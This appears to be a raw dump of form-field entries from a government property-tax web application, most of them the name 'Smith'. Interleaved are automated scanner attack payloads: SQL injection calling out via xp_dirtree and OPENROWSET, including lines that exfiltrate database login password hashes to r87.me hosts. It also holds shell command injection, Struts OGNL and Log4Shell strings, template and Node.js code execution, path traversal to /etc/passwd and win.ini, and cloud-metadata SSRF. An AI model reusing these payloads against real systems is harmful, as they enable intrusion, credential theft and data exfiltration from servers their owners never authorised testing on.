7465
7466
7467 Smith \';netsparker(0x054438);///
7468
7469 Smith
7470 Smith
7471 Smith
7472 Smith
7473
7474 Smith
7475 Smith
7476 Smith
7477
7478
7479
7480 '+print localtime()*0+0xFFF9999-98233+'
7481 &nslookup "tbiqvedsq63eazxa1jmogv30hwigqyysibpeta7p""ks8.r87.me"
7482
7483 file:///windows/win.ini
7484 file:///windows/win.ini
7485 Smith eval('print localtime()*0+0xFFF9999-27153')
7486 Smith
7487 Smith
7488 Smith
7489 Smith
7490 Smith
7491 netsparker(0x054456)
7492
7493
7494 /../../../../../../../../../../windows/win.ini
7495 Smith
7496
7497 Smith
7498
7499 Smith
7500 Smith
7501 nslookup "tbiqvedsq6onh_3_nvrxe8lvgy6bvonylv3siju8""gom.r87.me"
7502
7503 Smith
7504 Smith
7505
7506 Smith
7507 Smith
7508 Smith
7509 Smith
7510 Smith
7511 Smith
7512 Smith
7513 Smith
7514 netsparker(0x054463);
7515
7516
7517 Smith
7518 Smith netsparker(0x054464);
7519 Smith
7520 Smith
7521
7522 Smith
7523 Smith
7524
7525 Smith
7526
7527
7528
7529 Smith //r87.com/n/j/?0x05443A
7530
7531 Smith
7532 Smith
7533
7534 Smith
7535 Smith
7536 Smith
7537 Smith
7538 exec('xp_dirtree ''\\tbiqvedsq609t00jzqyuw001ooahqphdewuutn4p'+'m0q.r87.me'+'\c$\a''')
7539
7540 Smith
7541
7542 /../../../../../../../../../../boot.ini.php
7543 %22%2bnetsparker(0x054492)%2b%22
7544 Smith
7545
7546
7547
7548
7549 Smith
7550 1/../../../../../../../../../../boot.ini
7551 Smith
7552
7553 Smith %22%2bnetsparker(0x054493)%2b%22
7554 Smith
7555 file:///boot.ini
7556 Smith
7557 Smith
7558
7559
7560 Smith
7561 Smith
7562
7563
7564 1/../../../../../../../../../../boot.ini
7565
7566
7567
7568
7569 Smith
7570
7571
7572 Smith
7573 Smith
7574 Smith
7575 Smith
7576 Smith
7577
7578 Smith '+print localtime()*0+0xFFF9999-94206+'
7579 Smith
7580 Smith
7581 &nslookup "tbiqvedsq6sdv04jejnn6-lbikihfmtjcfe8itaw""mvg.r87.me"
7582
7583 Smith
7584 Smith
7585
7586 '&nslookup "tbiqvedsq6nbvdffeh5gq8hrfjjrmkbgnubjzt7a""3dc.r87.me"
7587 '&nslookup "tbiqvedsq68f2r5ucjg1m0iadbakeoehc3wjm-zt""moo.r87.me"
7588 Smith
7589 /../../../../../../../../../../windows/win.ini.aspx
7590 /../../../../../../../../../../windows/win.ini.aspx
7591 Smith
7592
7593
7594 Smith exec('xp_dirtree ''\\tbiqvedsq6wgt6zwgsldiq6yqaidurdkysa1qs8q'+'yf0.r87.me'+'\c$\a''')
7595 //r87.com/?0x0544FE
7596 Smith
7597 exec('xp_dirtree ''\\tbiqvedsq6rj8fz4jodkiqvrksnp3dtvitw2jcts'+'ukw.r87.me'+'\c$\a''')
7598 Smith
7599 Smith
7600 Smith
7601
7602
7603 Smith NSFTW
7604 Smith
7605
7606 Smith
7607 Smith
7608 \";netsparker(0x054502);///
7609 Smith
7610 Smith
7611 Smith
7612
7613 Smith
7614 Smith
7615
7616 Smith
7617 Smith
7618 declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.tbiqvedsq6eoxgrb57yhinutvkccuu5x1zkcsuat'+'gvg.r87.me' from sys.sql_logins WHERE principal_id=1;exec('xp_dirtree ''\\'+@h+'\c$''')
7619 Smith
7620 Smith
7621
7622 Smith
7623 file:///boot.ini
7624 c:\boot.ini
7625 Smith //r87.com/?0x0544FF
7626 Smith
7627 Smith
7628
7629 Smith
7630 Smith
7631 Smith
7632 "&nslookup "tbiqvedsq6ni10cyfbyekuxo8v0uqrdki7fjzk79""5fk.r87.me"
7633 Smith
7634 Smith
7635
7636 Smith declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.tbiqvedsq6dvw1xnb4ndelcvf1qbg7opbwsb3lzl'+'pds.r87.me' from sys.sql_logins WHERE principal_id=1;exec('xp_dirtree ''\\'+@h+'\c$''')
7637 Smith "+print localtime()*0+0xFFF9999-22482+"
7638 Smith
7639 Smith exec('xp_dirtree ''\\tbiqvedsq6ckwmmjmz4jcsx0tnvvtap4zos9d9z6'+'qjk.r87.me'+'\c$\a''')
7640 Smith
7641 Smith
7642 Smith
7643 Smith
7644 '+NSFTW+'
7645
7646 Smith
7647 Smith
7648 Smith
7649 Smith
7650 Smith
7651 Smith
7652 Smith
7653 Smith
7654 Smith
7655
7656 Smith
7657 Smith
7658 Smith
7659 Smith
7660
7661 Smith
7662 Smith
7663
7664 c:\windows\win.ini
7665 Smith
7666
7667 Smith
7668 Smith
7669 Smith
7670 Smith
7671 Smith
7672
7673 Smith
7674
7675
7676 Smith
7677 "&nslookup "tbiqvedsq67ghvgrg2mlwybak8a9hiqjqlufhd7q""z4m.r87.me"
7678 Smith
7679 1;exec('xp_dirtree ''\\tbiqvedsq6cok2rt0ajajqnfwwiefcibiinmalrx'+'xjy.r87.me'+'\c$\a''')--
7680 Smith
7681 Smith \";netsparker(0x054503);///
7682 Smith
7683 ;netsparker(0x054511)//\
7684 Smith
7685
7686 arguments[1].end(require('child_process').execSync('expr 268409241 - 53561'))
7687 Smith
7688 Smith '+NSFTW+'
7689
7690 c:\boot.ini
7691 Smith
7692 Smith
7693 Smith
7694 Smith
7695
7696 Smith
7697 Smith
7698 Smith
7699
7700 Smith
7701 declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.tbiqvedsq6kqp-pytniiq6xl4aroyzuankzt45l5'+'if0.r87.me' from sys.sql_logins WHERE principal_id=1;exec('xp_dirtree ''\\'+@h+'\c$''')
7702
7703 Smith
7704 Smith
7705 Smith
7706 Smith
7707 Smith
7708 Smith
7709 c:\windows\win.ini
7710 Smith
7711 Smith
7712
7713 Smith
7714
7715 |nslookup${IFS}"tbiqvedsq69sb0aixxj7knxskiybfyfsdkmusgdi""kvo.r87.me"
7716 Smith
7717 Smith
7718 Smith
7719 Smith
7720
7721 Smith
7722 Smith
7723 Smith
7724 Smith
7725 Smith
7726 Smith
7727
7728
7729 Smith
7730 Smith
7731 Smith
7732
7733
7734 Smith
7735 Smith
7736
7737 Smith
7738
7739 Smith
7740
7741 ns../../../../../../../../../../../boot.ini.........................................................
7742 N3tSp4rK3R
7743
7744 ns../../../../../../../../../../../boot.ini.........................................................
7745 Smith
7746
7747 Smith
7748 1;exec('xp_dirtree ''\\tbiqvedsq6xizwn__f95qdtd89oyksdbyswbtmol'+'qja.r87.me'+'\c$\a''')--
7749 Smith
7750 Smith
7751 Smith
7752
7753
7754
7755 '"/$[].>
7756 Smith
7757 '"/$[].>
7758
7759 Smith
7760
7761
7762 -1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
7763
7764 Smith 1;exec('xp_dirtree ''\\tbiqvedsq6uemo9nqpjcopkl1cptnyggozxb2jzl'+'_ak.r87.me'+'\c$\a''')--
7765 -1';exec('xp_dirtree ''\\tbiqvedsq6ai7hiaabxloanknehy1cdicehwmg2m'+'tmu.r87.me'+'\c$\a''')--
7766 Smith -1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
7767 http://r87.com/n?.php
7768 Smith
7769 Smith
7770 %27%22%2f%24%5b%5d.%3e
7771 propertytax.jk.gov.in/trace.axd
7772 https://propertytax.jk.gov.in/trace.axd
7773 Smith %{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-8239)}
7774
7775 Smith
7776
7777 Smith
7778
7779 gethostbyname(trim('tbiqvedsq6-nq0vddvsz7n7lqtissygotcp94oab'.'kpm.r87.me'))
7780 Smith
7781 164.100.223.17/trace.axd
7782 ${28275*28275-(77000)}
7783 164.100.223.17/trace.axd
7784 Smith //r87.com/n/j/?0x05452D
7785 Smith
7786 gethostbyname(trim('tbiqvedsq6cpwi4tjcwddxop29obxh_ivqqef3gz'.'jh8.r87.me'));
7787 Smith
7788
7789 Smith
7790 Smith (length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
7791
7792 Smith arguments[1].end(require('child_process').execSync('set /A 268409241 - 38560'))
7793 Smith
7794 Smith
7795 Smith
7796
7797 Smith
7798
7799 Smith
7800 Smith
7801 Smith
7802
7803 Smith
7804
7805 Smith
7806 Smith
7807
7808 Smith
7809 Smith
7810 Smith
7811 Smith
7812 Smith
7813 Smith
7814 Smith ;netsparker(0x054512)//\
7815 Smith
7816 NS09
7817 %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
7818 -1';exec('xp_dirtree ''\\tbiqvedsq6dtrdqdusxwh_5walsj1xdwlolsqzv7'+'ryw.r87.me'+'\c$\a''')--
7819 Smith
7820
7821 Smith
7822 http://r87.com/n?.php
7823 Smith -1';exec('xp_dirtree ''\\tbiqvedsq6voamwlzemll-tkb6excfilgu6rmccm'+'sza.r87.me'+'\c$\a''')--
7824 Smith gethostbyname(trim('tbiqvedsq6pyti6uotm0uxlowo3s8piqf9-oy5xs'.'ysc.r87.me'));
7825 Smith
7826 Smith
7827 Smith
7828
7829
7830 |nslookup${IFS}"tbiqvedsq6lrq1bc2erpqkvxxwxvlvdr1xdnsgix""24o.r87.me"
7831 NS09
7832 Smith
7833 Smith
7834
7835 Smith
7836 Smith
7837 Smith
7838 Smith
7839 Smith
7840
7841 Smith
7842 Smith
7843 '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
7844
7845 Smith
7846 Smith
7847 Smith
7848 Smith
7849 Smith
7850 %27%22%2f%24%5b%5d.%3e
7851 Smith
7852 Smith
7853
7854 Smith
7855 Smith
7856 Smith
7857 Smith
7858 \";netsparker(0x05452E);///
7859 Smith
7860 Smith
7861 Smith
7862 Smith
7863 Smith
7864
7865 Smith
7866 ...//...//...//...//...//...//...//...//...//...//...//windows/win.ini
7867
7868 Smith
7869 Smith
7870
7871 Smith
7872 Smith
7873 Smith
7874 p "#{0xFFF9999.to_i-`echo 37320`.to_i}"
7875 Smith
7876 Smith
7877 Smith
7878 Smith
7879 127.100.11.2/trace.axd
7880 Smith
7881 Smith
7882
7883 Smith
7884 Smith
7885
7886
7887
7888 Smith
7889 Smith -1';exec('xp_dirtree ''\\tbiqvedsq63s3ufwtuedeslt2stjyd11vchy8nmt'+'1pc.r87.me'+'\c$\a''')--
7890 http://r87.com/n?.php
7891
7892 Smith
7893
7894 +gethostbyname(trim('tbiqvedsq6cslchlnvy9y3b2pa1xzjvpigljaixn'.'muy.r87.me'));//
7895
7896 Smith '||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
7897
7898 1) exec('xp_dirtree ''\\tbiqvedsq6ayy1h-rjtb0wm8kfbbrrpnsfpyxr1y'+'lw0.r87.me'+'\c$\a''')--
7899
7900 ' WAITFOR DELAY '0:0:25'-- /* c28b9e20-25b3-4503-b4c5-507e11a84f8a */
7901 Smith
7902
7903 Smith
7904
7905
7906 Smith
7907 Smith
7908 Smith
7909 Smith p "#{0xFFF9999.to_i-`echo 99016`.to_i}"
7910 ' WAITFOR DELAY '0:0:1'-- /* d43191e4-ea72-4350-842d-38d6aa8df35b */
7911 Smith
7912 ' WAITFOR DELAY '0:0:1'-- /* 3571983a-3349-4f27-af03-4e408d1d8006 */
7913 Smith
7914 Smith
7915 Smith \";netsparker(0x05452F);///
7916 Smith
7917 Smith
7918 ;netsparker(0x054532)//\
7919 Smith
7920 Smith
7921 Smith ;netsparker(0x054533)//\
7922 Smith
7923 Smith
7924 Smith
7925 Smith
7926 Smith
7927 Smith
7928 Smith
7929 Smith
7930
7931 Smith
7932 NS09
7933 Smith
7934 Smith
7935 Smith
7936 Smith
7937 Smith
7938 Smith
7939 Smith
7940
7941 '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
7942 Smith
7943 Smith
7944 Smith
7945 %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
7946 Smith
7947 file%3a%2f%2f%2fboot.ini
7948 1) exec('xp_dirtree ''\\tbiqvedsq6azd7s-5reeneohoyticgjupjzao1fi'+'qcy.r87.me'+'\c$\a''')--
7949 Smith
7950 Smith 1) exec('xp_dirtree ''\\tbiqvedsq6r-pgoxu6fcq8wuqns4xw7eh2xpv5vw'+'rc4.r87.me'+'\c$\a''')--
7951 Smith +gethostbyname(trim('tbiqvedsq6yg_g7bikeo9mn0mz-fo726_3unchz5'.'udu.r87.me'));//
7952 Smith
7953 Smith
7954 Smith
7955
7956 ...//...//...//...//...//...//...//...//...//...//...//windows/win.ini
7957 Smith
7958 %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#c
7959
7960 -1'||'1'=='1
7961 -1'||1=='1
7962 -1'||'a'=='a
7963
7964 Smith
7965 ' WAITFOR DELAY '0:0:25'-- /* 321af246-2575-43d2-8589-63f79f416e7d */
7966 -1'||'1'=='2
7967 Smith
7968 Smith __import__('os').popen(('expr 268409241 - {0}').format('75238')).read()
7969 ' WAITFOR DELAY '0:0:1'-- /* 6845908a-dae4-4029-bde1-4d7d6fea4ccc */
7970 Smith 1) exec('xp_dirtree ''\\tbiqvedsq6ba6mdmxbiiztnd9ai51soprw2g_20o'+'bbk.r87.me'+'\c$\a''')--
7971 ' WAITFOR DELAY '0:0:25'-- /* 0ec4eb96-ea05-484c-95a9-53738a815501 */
7972 Smith
7973 Smith
7974 ns:netsparker056650=vuln
7975 http://r87.com/n?.php
7976
7977 Smith
7978
7979
7980
7981 php://filter//resource=http://r87.com/n?.php
7982
7983 Smith
7984 1')exec('xp_dirtree ''\\tbiqvedsq6mlapfk7aogcd0-uhkz4jjobbls17zw'+'ja4.r87.me'+'\c$\a''')--
7985 Smith
7986 r87.com/n
7987 ' WAITFOR DELAY '0:0:1'-- /* 4c3f4995-1ba8-459b-8908-68927a8d7305 */
7988 Smith
7989 Smith "+gethostbyname(trim('tbiqvedsq67xpawizpgct3evaihlcpakmywrcg3p'.'tke.r87.me'))+"
7990 [::1]/trace.axd
7991 '||true||'
7992
7993
7994
7995 127.0.0.1/trace.axd
7996
7997
7998
7999 Smith
8000 {{__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgdGJpcXZlZHNxNm1fZjdpcGJ
8001 Smith
8002 '||NS=='ss
8003 Smith
8004
8005 Smith '{${gethostbyname(trim('tbiqvedsq69uijcwbyzit0igrtcudir--10f-ime'.'yj4.r87.me'))}}'
8006 1))exec('xp_dirtree ''\\tbiqvedsq6hsf3l0opaipg2eprd5h2mtbzq2lrdv'+'wvo.r87.me'+'\c$\a''')--
8007 '{${gethostbyname(trim('tbiqvedsq6fe8duvmm1pkuyfysbz3snk9z2orkn0'.'d-m.r87.me'))}}'
8008 Smith
8009 -1'||'1'=='1
8010 Smith
8011 Smith
8012
8013 Smith
8014 Smith
8015
8016 Smith
8017 Smith
8018 %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#c
8019 Smith
8020 Smith 1')exec('xp_dirtree ''\\tbiqvedsq66bewitp_ntvxmfh3wtaxqtlj6kmcr7'+'bee.r87.me'+'\c$\a''')--
8021 127.100.11.2/trace.axd
8022 ' WAITFOR DELAY '0:0:1'-- /* 4c3f4995-1ba8-459b-8908-68927a8d7305 */
8023 Smith '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
8024 -1'||1=='1
8025
8026
8027 Smith NS09
8028
8029 -1'||'a'=='a
8030 -1%27+and+6%3d3+or+1%3d1%2b(SELECT+1+and+ROW(1%2c1)%3e(SELECT+COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.COLLATIONS+GROUP+BY+x)a)%2b%27
8031 Smith
8032 -1'||true||'
8033 -1'||'1'=='2
8034 Smith
8035
8036
8037 Smith
8038 Smith
8039 Smith
8040 '||'7892'=='7893
8041 '||'7891'=='7891
8042
8043 Smith
8044
8045
8046 Smith
8047 Smith 1')exec('xp_dirtree ''\\tbiqvedsq6lswrap3rw1nqvhbovhsfi9uremtlxm'+'jfc.r87.me'+'\c$\a''')--
8048 Smith
8049 Smith
8050 Smith
8051 Smith
8052 Smith
8053 {% set d = "eval(__import__('base64').urlsafe_b64decode('X19pbXBvcnRfXygnb3MnKS5wb3BlbihfX2ltcG9ydF9
8054 Smith
8055 ' WAITFOR DELAY '0:0:25'-- /* d2d3d67c-67c9-4ee1-bf22-316271412b6d */
8056 Smith
8057
8058 file%3a%2f%2f%2fboot.ini
8059
8060 Smith
8061 Smith
8062 Smith
8063 Smith
8064 1 WAITFOR DELAY '0:0:25'-- /* c3655cdc-cab2-4c4e-8d20-1aee0dce5f64 */
8065 r87.com/n
8066
8067 ....//....//....//....//....//....//....//....//....//....//....//windows/win.ini
8068 '||true||'
8069 createobject("WScript.Shell").exec("nslookup tbiqvedsq6fai8_rh07hhtsnyix-wawxbj3yjshl" & "2mw.r87.me").StdOut.ReadAll
8070 Smith
8071 Smith
8072 Smith
8073 1))exec('xp_dirtree ''\\tbiqvedsq6utjaqabijcgth2mnshfn1hyfwehwvz'+'rbo.r87.me'+'\c$\a''')--
8074 Smith
8075 Smith
8076 Smith
8077 Smith
8078
8079 Smith
8080 Smith
8081 Smith
8082 Smith
8083 Smith
8084 Smith
8085
8086 Smith
8087 Smith
8088
8089 Smith
8090 Smith 1))exec('xp_dirtree ''\\tbiqvedsq6sjaich4zj3ul9t7fbd04et7y6duafm'+'v1k.r87.me'+'\c$\a''')--
8091 Smith
8092 Smith
8093 Smith createobject("WScript.Shell").exec("nslookup tbiqvedsq6zsev5qo2cxxffuujsfaboozmhe4jzn" & "suy.r87.me").StdOut.ReadAll
8094 https://propertytax.jk.gov.in/elmah.axd
8095
8096
8097
8098 Smith
8099 Smith
8100 Smith
8101 Smith
8102 {% set d = "eval(__import__('base64').urlsafe_b64decode('X19pbXBvcnRfXygnb3MnKS5wb3BlbihfX2ltcG9ydF9
8103 Smith
8104
8105 Smith
8106 1 WAITFOR DELAY '0:0:25'-- /* d133aeff-ed4a-45da-a3a2-a452e40bddcb */
8107
8108 1 WAITFOR DELAY '0:0:25'-- /* cb010b20-48ae-4fb7-a416-c6625af7ca0b */
8109 Smith
8110 Smith +createobject("WScript.Shell").exec("nslookup tbiqvedsq68praixjcrhjp-i8k45w1eiyu38jxwu" & "-uo.r87.me").StdOut.ReadAll
8111 WAITFOR DELAY '0:0:25'-- /* 8476441c-8eb2-4f88-8d37-5b54fb82f194 */
8112 +createobject("WScript.Shell").exec("nslookup tbiqvedsq6ghxomb0r-syr4tfa_mbi9eb235de63" & "uuq.r87.me").StdOut.ReadAll+
8113 Smith
8114 Smith
8115
8116
8117
8118 Smith
8119 +createobject("WScript.Shell").exec("nslookup tbiqvedsq6zvyyizmgehiulxvpcyj5nxot0l0ocx" & "ayi.r87.me").StdOut.ReadAll
8120 1'))exec('xp_dirtree ''\\tbiqvedsq6ouzm-6jwm4ppuoymejv76wrzwa7kbv'+'zce.r87.me'+'\c$\a''')--
8121
8122
8123 Smith 1'))exec('xp_dirtree ''\\tbiqvedsq634dfe2z-w-7qxayvi3nxyjn9mbx1dq'+'2ky.r87.me'+'\c$\a''')--
8124 WAITFOR DELAY '0:0:1'-- /* cda943c7-f1af-4c87-99e6-4617ab3c5c8b */
8125 Smith
8126 1'))exec('xp_dirtree ''\\tbiqvedsq6rbx-dgboklzmwwjs9oprb6sjtj7srs'+'w_s.r87.me'+'\c$\a''')--
8127 Smith
8128
8129
8130 = global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgdGJpcXZlZHNxNjJ1dH
8131 = global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgdGJpcXZlZHNxNmU3dX
8132
8133 Smith
8134 Smith '||'1'=='1
8135 syscolumns WHERE 2>3;exec('xp_dirtree ''\\tbiqvedsq65hdjs6z4neyrwt_c3ek8vwu7nqyk2m'+'u1a.r87.me'+'\c$\a''')--
8136 Smith
8137 Smith '||'N'=='3
8138
8139
8140
8141
8142 Smith
8143 Smith
8144 WAITFOR DELAY '0:0:1'-- /* cc4dedc8-31e1-413f-84fb-9c489bea7434 */
8145
8146 Smith
8147 Smith
8148 Smith
8149 %27%3bsleep%2825000%29%3bns%28%29%3b%27 /* f436123f-4834-44a4-88db-0845fb078fde */
8150 Smith
8151
8152 SET /A 0xFFF9999-81197
8153
8154
8155 Smith
8156 '"/$[].>
8157 Smith '||'1'=='2
8158 Smith
8159 tbiqvedsq6stoah3upg602v3bpjkytq3qxlycdmxnab.r87.me/p/
8160 %27%3bsleep%281000%29%3bns%28%29%3b%27 /* 58318264-46de-47cf-80de-e8d0d812e91b */
8161 %27%3bsleep%281000%29%3bns%28%29%3b%27 /* 58318264-46de-47cf-80de-e8d0d812e91b */
8162 DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','tbiqvedsq6npdhstes06kl0yqwi9gn-zw2vencjh'+'kri.r87.me')exec sp_executesql @r
8163 Smith
8164 Smith
8165 Smith
8166 Smith DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','tbiqvedsq6pfjtcnnspdzdms9wp3bedba_acqqb0'+'mv8.r87.me')exec sp_executesql @r
8167 Smith
8168 Smith
8169 Smith %27%22%2f%24%5b%5d.%3e
8170 1';expr 268409241 - 55212;'
8171 /../../../../../../../../../../web.config
8172 %27%22%2f%24%5b%5d.%3e
8173 Smith
8174 nslookup tbiqvedsq6o16yz4l0m3xtb0ulmrg16hf6ntq9zv^2m8.r87.me&'\"`0&nslookup tbiqvedsq6o16yz4l0m3xtb0ulmrg16hf6ntq9zv^2m8.r87.me&`'
8175
8176 require 'resolv';Resolv.getaddress ("tbiqvedsq6m6cwhh03irym2vzen9lgjpcnnijnlu".concat "sza.r87.me")
8177
8178 Smith
8179 1) WAITFOR DELAY '0:0:25'-- /* 43a65646-c3d1-4035-9eed-9bdebb5e5366 */
8180 ${${::-j}${::-n}${::-d}${::-i}:${::-d}${::-n}${::-s}://tbiqvedsq6fvxx27_fbktnypv0njk${lower:p}qx6zwq
8181 Smith
8182 Smith
8183 Smith
8184 https://propertytax.jk.gov.in/elmah
8185 Smith -1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','tbiqvedsq6mhwvqxr-llzv-lovwrjhjkngvyokhd'+'774.r87.me')exec sp_executesql @r--
8186 Smith "&nslookup "tbiqvedsq6padjiemqupnna5gajpkxxwzqzwv5ep""zds.r87.me"
8187
8188 .....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///windows/win.
8189 Smith php://filter//resource=http://tbiqvedsq6qwubwq7o06hz03l28dmwz1ysxie-cv7l3.r87.me/p/
8190 https://propertytax.jk.gov.in/elmah
8191 tbiqvedsq6w-2wjkuu_ihpnnwmovs7g0w4d8s_y3h5n.r87.me/p/
8192 /../../../../../../../../../../windows/iis6.log
8193
8194 Smith
8195 expr 268409241 - 32123
8196 Smith %{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup `whoami`."tbiqvedsq6piivrrmyczekqhvfw7keu8vdjschrh""kvk.r87.me"').(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd})
8197 %27%3bsleep%2825000%29%3bns%28%29%3b%27 /* b739c364-83f2-49c7-a804-c6f1358e1a41 */
8198 ....//....//....//....//....//....//....//....//....//....//....//windows/win.ini
8199
8200 |expr 268409241 - 23592
8201
8202 Smith
8203 cast((SELECT dblink_connect('host=tbiqvedsq6ezwf0waaj8xfltzmzio7spqf6yhf0x'||'rr4.r87.me user=a password=a connect_timeout=2')) as numeric)
8204 %27%3bsleep%281000%29%3bns%28%29%3b%27 /* 0417125a-affe-48f7-9f73-ed772473feb5 */
8205 = global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgdGJpcXZlZHNxNmQtbWtzMXVjc3RrNTZueGtkZHJsbmpvLTNoaWVreW5tYy5yODcubWU=','base64').toString())
8206 Smith
8207
8208 Smith
8209 /../../../../../../../../../../etc/httpd/logs/error_log
8210
8211 /../../../../../../../../../../var/log/apache2/error.log
8212 Smith
8213 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/
8214 Smith
8215 Smith
8216 1) WAITFOR DELAY '0:0:1'-- /* 07a99498-e7e2-42b1-b572-ae92dbdb639a */
8217 Smith 127.100.11.2/elmah.axd
8218 Smith
8219
8220 Smith {php}Smarty_Resource::parseResourceName(system("nslookup tbiqvedsq6n0v-hupnkam7bk4dfxh5x489yvezgk"."0xs.r87.me"),'b');{/php}
8221 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY/
8222 /../../../../../../../../../../var/log/apache/error.log
8223
8224
8225 https://propertytax.jk.gov.in/server-status
8226 Smith
8227 Smith
8228 Smith
8229 Smith
8230 Smith
8231
8232 Smith
8233 Smith
8234 Smith
8235 ')) WAITFOR DELAY '0:0:25'-- /* 37162dab-e2a4-41a0-b53c-fddfa620937a */
8236 127.100.11.2/elmah
8237 Smith {{ 268409241- 41397 }}
8238 __import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgdGJpcXZlZHNxNl9icndpem9zcnlhdjFud3ljODhha3JjcnZ0ankzeHVjYy5yODcubWU=')).read()
8239
8240 Smith
8241 Smith
8242 1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(49);WAITFOR/**/DELAY/
8243 /../../../../../../../../../../proc/version
8244 Smith ${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup tbiqvedsq6hviuqb1cf-pzmnepbxv_rb3ongkg64'+'nrm.r87.me')}
8245 ')) WAITFOR DELAY '0:0:1'-- /* 18e6ce5e-50a4-4f68-bcf5-78f3057f4d04 */
8246 Smith
8247
8248 file:///etc/passwd
8249 Smith
8250
8251 Smith
8252
8253 [::1]/elmah
8254 Smith
8255 Smith
8256 Smith
8257 ${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup tbiqvedsq6bnvdwe1pgssejoge14q3wg9zvayi2e'+'fvs.r87.me')}
8258 Smith
8259 /../../../../../../../../../../var/log/apache/error.log
8260
8261 Smith '||(SELECT dblink_connect('host=tbiqvedsq6c1ftomwn19hoexu-3lcbtu2aksqtwc'||'gd4.r87.me user=a password=a connect_timeout=2'))||'
8262 (select UTL_INADDR.GET_HOST_ADDRESS('tbiqvedsq668wp6ffqz_bxk_rp_i5ek6wzmutxpb'||'6jc.r87.me') from DUAL)
8263 /../../../../../../../../../../proc/version.aspx
8264 Smith
8265
8266 (select UTL_INADDR.GET_HOST_ADDRESS('tbiqvedsq6yirmwds9xhtpgeq3bhrromb5y-fdic'||'xtm.r87.me') from DUAL)
8267 /../../../../../../../../../../../etc/passwd
8268 Smith
8269 Smith
8270 Smith http://169.254.169.254/latest/meta-data/public-hostname
8271
8272
8273 Smith
8274 Smith
8275 ";l=document.createElement("link");l.rel="prefetch";l.href="//tbiqvedsq68jc-2vuc5mv8bvdyxazjpsybk0xs6n"+"1ko.r87.me/r/?"+location.href;document.head.appendChild(l);//
8276 syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)
8277 Smith
8278 Smith (268409241-94071)
8279 Smith
8280
8281 ')) WAITFOR DELAY '0:0:1'-- /* b648d94e-9679-4131-8cfc-c4e27c25b437 */
8282 Smith
8283 Smith
8284
8285 Smith
8286 Smith
8287 /../../../../../../../../../../../etc/passwd
